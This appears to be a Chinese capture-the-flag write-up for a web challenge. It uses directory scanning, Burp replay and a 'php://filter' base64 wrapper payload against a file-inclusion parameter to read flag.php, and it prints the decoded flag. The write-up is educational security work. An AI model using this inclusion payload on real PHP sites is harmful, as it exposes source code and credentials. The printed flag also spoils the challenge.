题目环境:
网页什么都没有,GET那里也没有任何参数和文件
F12查看隐藏文件
发现隐藏文件 点进去看看
发现一个可点击按钮 SECRET
好家伙,什么都没有
这里猜测还有隐藏文件
目录扫描
使用工具dirsearch
命令:
python dirsearch.py -u [http://a9c9b5bd-4430-4ffb-88bf-0eec1fa73296.node4.buuoj.cn:81/](http://a9c9b5bd-4430-4ffb-88bf-0eec1fa73296.node4.buuoj.cn:81/)
发现隐藏文件flag.php 补充一点,这里我用御剑没有扫描出来,不知道是什么问题,有知道的师傅还望解答,感谢!
访问flag.php
有内容但是flag没有显示出来,猜测flag是被编码了,需要用到PHP伪协议,但是不知道具体参数是什么,这里需要抓包 burpsuite抓包
使用火狐浏览器访问题目地址
点击SECRET进行抓包 右键后,Repeater进行重放
访问隐藏文件secr3t.php
strstr函数查询…/,tp,input,data在file变量里面是否存在,存在则输出0h no! 这对构造PHP伪协议毫无影响
使用参数file访问flag.php文件 回显结果更是表明了flag.php文件内容被编码了
构造PHP伪协议:
**php://filter/read=convert.base64-encode/resource=flag.php**
最终payload:
**URL/?file=php://filter/read=convert.base64-encode/resource=flag.php**
回显结果:
可以看到是明显的base64编码格式
放到Kali进行base64解码
echo "PCFET0NUWVBFIGh0bWw Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI PGJyPjxicj48YnI PGJyPjxicj48YnI CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO 8geS9oOaJvuWIsOaIkeS6hu 8geWPr aYr S9oOeci S4jeWIsOaIkVFBUX5 fjwvaDE PGJyPjxicj48YnI CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7ZTI0OTJhMTktZDhjYi00OGYzLWIwOTctYjM0OGQyNjEwZmExfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8 CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=" | base64 -d
回显结果:
得出flag:
flag{e2492a19-d8cb-48f3-b097-b348d2610fa1}
